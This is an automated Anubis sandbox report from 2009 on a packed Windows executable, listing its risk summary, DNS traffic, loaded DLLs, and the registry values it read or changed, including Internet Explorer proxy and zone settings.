anubis left
Anubis - Analysis Report
anubis right

Analysis Report for 8fc59226f4be149b0f869f7e59d32214

 Comment on this report

Summary:

Description Risk
Changes security settings of Internet Explorer: This system alteration could seriously affect safety surfing the World Wide Web. medium
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary. high
Spawns Processes: The executable produces processes during the execution. low
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys. low


Table of Contents
expand all expand all   collapse all collapse all

1. General Information

  - Information about Anubis' invocation  
Time needed: 241 s 
Report created: 07/01/09, 08:02:07 UTC 
Termination reason: Timeout 
Program version: 1.68.0 

1.a) - Network Activity

  -  Unknown UDP Traffic:  
from ANUBIS:1025 to 192.168.0.1:53
State: Normal establishment and termination - Transferred outbound Bytes: 32 - Transferred inbound Bytes: 116
from ANUBIS:1025 to 192.168.0.1:53
State: Normal establishment and termination - Transferred outbound Bytes: 64 - Transferred inbound Bytes: 232

2. sample.exe

  - General information about this executable  
Analysis Reason: Primary Analysis Subject 
Filename: sample.exe 
MD5: 8fc59226f4be149b0f869f7e59d32214 
SHA-1: 20978d7e476fc972127e77e14c44f5c98be1b348 
File Size: 9216 Bytes
Command Line: "C:\sample.exe" 
Process-status at analysis end: dead 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​gdi32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

  - Run-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​Normaliz.dll  0x00860000  0x00009000 
C:\​WINDOWS\​system32\​iertutil.dll  0x42990000  0x00045000 
C:\​WINDOWS\​system32\​WININET.dll  0x42C10000  0x000CF000 
C:\​WINDOWS\​system32\​urlmon.dll  0x42CF0000  0x00127000 
C:\​WINDOWS\​system32\​NETAPI32.dll  0x5B860000  0x00055000 
C:\​WINDOWS\​system32\​comctl32.dll  0x5D090000  0x0009A000 
C:\​WINDOWS\​system32\​hnetcfg.dll  0x662B0000  0x00058000 
C:\​WINDOWS\​System32\​mswsock.dll  0x71A50000  0x0003F000 
C:\​WINDOWS\​System32\​wshtcpip.dll  0x71A90000  0x00008000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​ws2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​sensapi.dll  0x722B0000  0x00005000 
C:\​WINDOWS\​system32\​DDRAW.dll  0x73760000  0x0004B000 
C:\​WINDOWS\​system32\​DCIMAN32.dll  0x73BC0000  0x00006000 
C:\​WINDOWS\​system32\​MSCTF.dll  0x74720000  0x0004C000 
C:\​WINDOWS\​system32\​USERENV.dll  0x769C0000  0x000B4000 
C:\​WINDOWS\​system32\​WINMM.dll  0x76B40000  0x0002D000 
C:\​WINDOWS\​system32\​rtutils.dll  0x76E80000  0x0000E000 
C:\​WINDOWS\​system32\​rasman.dll  0x76E90000  0x00012000 
C:\​WINDOWS\​system32\​TAPI32.dll  0x76EB0000  0x0002F000 
C:\​WINDOWS\​system32\​RASAPI32.dll  0x76EE0000  0x0003C000 
C:\​WINDOWS\​system32\​DNSAPI.dll  0x76F20000  0x00027000 
C:\​WINDOWS\​system32\​rasadhlp.dll  0x76FC0000  0x00006000 
C:\​WINDOWS\​system32\​CLBCATQ.DLL  0x76FD0000  0x0007F000 
C:\​WINDOWS\​system32\​COMRes.dll  0x77050000  0x000C5000 
C:\​WINDOWS\​system32\​OLEAUT32.dll  0x77120000  0x0008B000 
C:\​WINDOWS\​WinSxS\​x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\​comctl32.dll  0x773D0000  0x00103000 
C:\​WINDOWS\​system32\​ole32.dll  0x774E0000  0x0013D000 
C:\​WINDOWS\​system32\​SETUPAPI.dll  0x77920000  0x000F3000 
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​VERSION.dll  0x77C00000  0x00008000 
C:\​WINDOWS\​system32\​SHLWAPI.dll  0x77F60000  0x00076000 
C:\​WINDOWS\​system32\​SHELL32.dll  0x7C9C0000  0x00817000 

  - SigBuster Output  
UPX All_Versions SN:1634

2.a) sample.exe - Registry Activities

  - Registry Values Modified:  
Key Name New Value
HKLM\​SYSTEM\​CURRENTCONTROLSET\​HARDWARE PROFILES\​CURRENT\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info ProxyEnable 
HKLM\​Software\​Microsoft\​DirectDraw\​MostRecentApplication  ID  1246043257 
HKLM\​Software\​Microsoft\​DirectDraw\​MostRecentApplication  Name  sample.exe 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Common AppData  C:\​Documents and Settings\​All Users\​Application Data 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Common Desktop  C:\​Documents and Settings\​All Users\​Desktop 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Common Documents  C:\​Documents and Settings\​All Users\​Documents 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​MountPoints2\​{d14d83ce-7d74-11dc-97e2-806d6172696f}\​  BaseClass  Drive 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​MountPoints2\​{d14d83cf-7d74-11dc-97e2-806d6172696f}\​  BaseClass  Drive 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  AppData  C:\​Documents and Settings\​user\​Application Data 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cookies  C:\​Documents and Settings\​user\​Cookies 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Desktop  C:\​Documents and Settings\​user\​Desktop 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  History  C:\​Documents and Settings\​user\​Local Settings\​History 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Personal  C:\​Documents and Settings\​user\​My Documents 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  info AutoDetect 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  info IntranetName 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  info ProxyBypass 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​  info UNCAsIntranet 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info MigrateProxy 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings  info ProxyEnable 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​windows\​CurrentVersion\​Internet Settings\​Connections  info SavedLegacySettings  0x460000006800000001000000000000000000000000000000040000000000 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SOFTWARE\​CLASSES\​.ADE    Access.ADEFile.11 
HKLM\​SOFTWARE\​CLASSES\​.ADP    Access.Project.11 
HKLM\​SOFTWARE\​CLASSES\​.ASP    aspfile 
HKLM\​SOFTWARE\​CLASSES\​.BAT    batfile 
HKLM\​SOFTWARE\​CLASSES\​.CER    CERFile 
HKLM\​SOFTWARE\​CLASSES\​.CHM    chm.file 
HKLM\​SOFTWARE\​CLASSES\​.CMD    cmdfile 
HKLM\​SOFTWARE\​CLASSES\​.COM    comfile 
HKLM\​SOFTWARE\​CLASSES\​.CPL    cplfile 
HKLM\​SOFTWARE\​CLASSES\​.CRT    CERFile 
HKLM\​SOFTWARE\​CLASSES\​.EXE    exefile 
HKLM\​SOFTWARE\​CLASSES\​CLSID\​{20D04FE0-3AEA-1069-A2D8-08002B30309D}\​INPROCSERVER32    %SystemRoot%\​system32\​SHELL32.dll 
HKLM\​SOFTWARE\​CLASSES\​CLSID\​{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\​INPROCSERVER32    C:\​WINDOWS\​system32\​urlmon.dll 
HKLM\​SOFTWARE\​CLASSES\​CLSID\​{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\​INPROCSERVER32  ThreadingModel  Both 
HKLM\​SOFTWARE\​CLASSES\​CLSID\​{AEB6717E-7E19-11D0-97EE-00C04FD91972}\​INPROCSERVER32    shell32.dll 
HKLM\​SOFTWARE\​CLASSES\​DIRECTORY  AlwaysShowExt   
HKLM\​SOFTWARE\​CLASSES\​DRIVE\​SHELLEX\​FOLDEREXTENSIONS\​{FBEB8A05-BEEE-4442-804E-409D6C4515E9}  DriveMask  32 
HKLM\​SOFTWARE\​CLASSES\​EXEFILE\​SHELL\​OPEN\​COMMAND    "%1" %* 
HKLM\​SOFTWARE\​CLASSES\​MIME\​DATABASE\​CONTENT TYPE\​TEXT/HTML  Extension  .htm  16 
HKLM\​SOFTWARE\​CLASSES\​MIME\​DATABASE\​CONTENT TYPE\​TEXT/PLAIN  Extension  .txt 
HKLM\​SOFTWARE\​Microsoft\​CTF\​SystemShared\​  CUAS 
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnablePunycode 
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  UrlEncoding  0x00000000 
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​User Agent\​Post Platform  .NET CLR 1.1.4322   
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​User Agent\​Post Platform  .NET CLR 2.0.50727   
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​User Agent\​Post Platform  .NET CLR 3.0.04506.30   
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​User Agent\​Post Platform  InfoPath.1   
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​User Agent\​UA Tokens     
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​User Agent\​UA Tokens  MSN 2.0   
HKLM\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​User Agent\​UA Tokens  MSN 2.5   
HKLM\​SYSTEM\​CurrentControlSet\​Control\​Session Manager  CriticalSectionTimeout  2592000 
HKLM\​SYSTEM\​CurrentControlSet\​Services\​Winsock\​Parameters  Transports  0x5400630070006900700000004e0065007400420049004f00530000000000 
HKLM\​SYSTEM\​Setup  OsLoaderPath  \​ 
HKLM\​SYSTEM\​Setup  SystemPartition  \​Device\​HarddiskVolume1 
HKLM\​SYSTEM\​Setup  SystemSetupInProgress 
HKLM\​SYSTEM\​WPA\​MediaCenter  Installed 
HKLM\​Software\​Microsoft\​COM3  Com+Enabled 
HKLM\​Software\​Microsoft\​COM3  REGDBVersion  0x0f00000000000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Bug!  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Bug!  ID  0x3d620932 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Bug!  Name  BUG!.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​DemolitionDerby2  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​DemolitionDerby2  ID  0x44838832 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​DemolitionDerby2  Name  DD2.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MortalKombat3  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MortalKombat3  ID  0xfc6de731 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MortalKombat3  Name  MK3W.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MsGolf98  Flags  0x20000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MsGolf98  ID  0x0dea1a35 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​MsGolf98  Name  game.exe 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NHLPowerPlay  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NHLPowerPlay  ID  0xff3fbf31 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NHLPowerPlay  Name  PP96.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NortonSystemInfo  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NortonSystemInfo  ID  0x29ea6332 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​NortonSystemInfo  Name  SI32.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Rogue Squadron  Flags  0x40000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Rogue Squadron  ID  0xd1d74c36 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Rogue Squadron  Name  ROGUE SQUADRON.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Savage  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Savage  ID  0x00876531 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Savage  Name  SAVAGE32.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ScorchedPlanet  Flags  0x02000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ScorchedPlanet  ID  0x69044c32 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ScorchedPlanet  Name  SPLANETW.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​SilentThunder  Flags  0x01000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​SilentThunder  ID  ] 5V 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​SilentThunder  Name  A10SIM.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  ID  0x66cb9533 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​Terracide  Name  TERAWIN.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  ID  0xbf817f32 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ThirdDimension  Name  t3rd.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  ID  m[M3 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisQualityBenchmark  Name  BEND3DIM.EXE 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  Flags  0x04000000 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  ID  0x46fc4b33 
HKLM\​Software\​Microsoft\​DirectDraw\​Compatibility\​ZiffDavisWinMarkBenchmark  Name  WBD3D.EXE 
HKLM\​Software\​Microsoft\​Internet Explorer\​Main\​FeatureControl\​FEATURE_BEHAVIORS 
HKLM\​Software\​Microsoft\​Internet Explorer\​Main\​FeatureControl\​FEATURE_DISABLE_MK_PROTOCOL 
HKLM\​Software\​Microsoft\​Tracing  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  ConsoleTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableConsoleTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  EnableFileTracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileDirectory  %windir%\​tracing 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  FileTracingMask  4294901760 
HKLM\​Software\​Microsoft\​Tracing\​RASAPI32  MaxFileSize  1048576 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  AllUsersProfile  All Users  11 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  DefaultUserProfile  Default User  11 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList  ProfilesDirectory  %SystemDrive%\​Documents and Settings  22 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  CentralProfile   
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  Flags 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  ProfileImagePath  %SystemDrive%\​Documents and Settings\​user  12 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  ProfileLoadTimeHigh  29931941 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  ProfileLoadTimeLow  1446385964 
HKLM\​Software\​Microsoft\​Windows NT\​CurrentVersion\​ProfileList\​S-1-5-21-1229272821-1004336348-527237240-1003  State  256 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  CommonFilesDir  C:\​Program Files\​Common Files  11 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  DevicePath  %SystemRoot%\​inf 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion  ProgramFilesDir  C:\​Program Files  11 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​ShellExecuteHooks  {AEB6717E-7E19-11d0-97EE-00C04FD91972}   
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Common AppData  %ALLUSERSPROFILE%\​Application Data 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Common Desktop  %ALLUSERSPROFILE%\​Desktop 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​User Shell Folders  Common Documents  %ALLUSERSPROFILE%\​Documents 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Content  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​Cookies  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​5.0\​Cache\​History  PerUserItem 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​Domains\​\​msn.com     
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Internet Settings\​ZoneMap\​Domains\​\​msn.com\​related  http 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  DriverCachePath  %SystemRoot%\​Driver Cache 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  LogLevel 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  ServicePackCachePath  c:\​windows\​ServicePackFiles\​ServicePackCache 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  ServicePackSourcePath  c:\​windows\​ServicePackFiles 
HKLM\​Software\​Microsoft\​Windows\​CurrentVersion\​Setup  SourcePath  D:\​ 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  AuthenticodeEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  TransparentEnabled 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​ComputerName\​ActiveComputerName  ComputerName  USER  13 
HKLM\​System\​CurrentControlSet\​Control\​MediaProperties\​PrivateProperties\​Joystick\​Winmm  wheel 
HKLM\​System\​CurrentControlSet\​Control\​ProductOptions  ProductType  WinNT 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  ComSpec  %SystemRoot%\​system32\​cmd.exe  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  FP_NO_HOST_CHECK  NO  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  NUMBER_OF_PROCESSORS  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  OS  Windows_NT  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PATHEXT  .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_ARCHITECTURE  x86  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_IDENTIFIER  x86 Family 6 Model 3 Stepping 3, GenuineIntel  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_LEVEL  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_REVISION  0303  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  Path  %SystemRoot%\​system32;%SystemRoot%;%SystemRoot%\​System32\​Wbem  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TEMP  %SystemRoot%\​TEMP  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TMP  %SystemRoot%\​TEMP  22 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  windir  %SystemRoot%  22 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Domain   
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Hostname  user 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  UseDomainNameDevolution 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  HelperDllName  %SystemRoot%\​System32\​wshtcpip.dll 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  Mapping  0x0b0000000300000002000000010000000600000002000000010000000000 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MaxSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MinSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  UseDelayedAcceptance 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters  WinSock_Registry_Version  2.0 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Num_Catalog_Entries 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  DisplayString  Tcpip 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  ProviderId  0x409d05229e7ecf11ae5a00aa00a7112b 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  StoresServiceClassInfo 
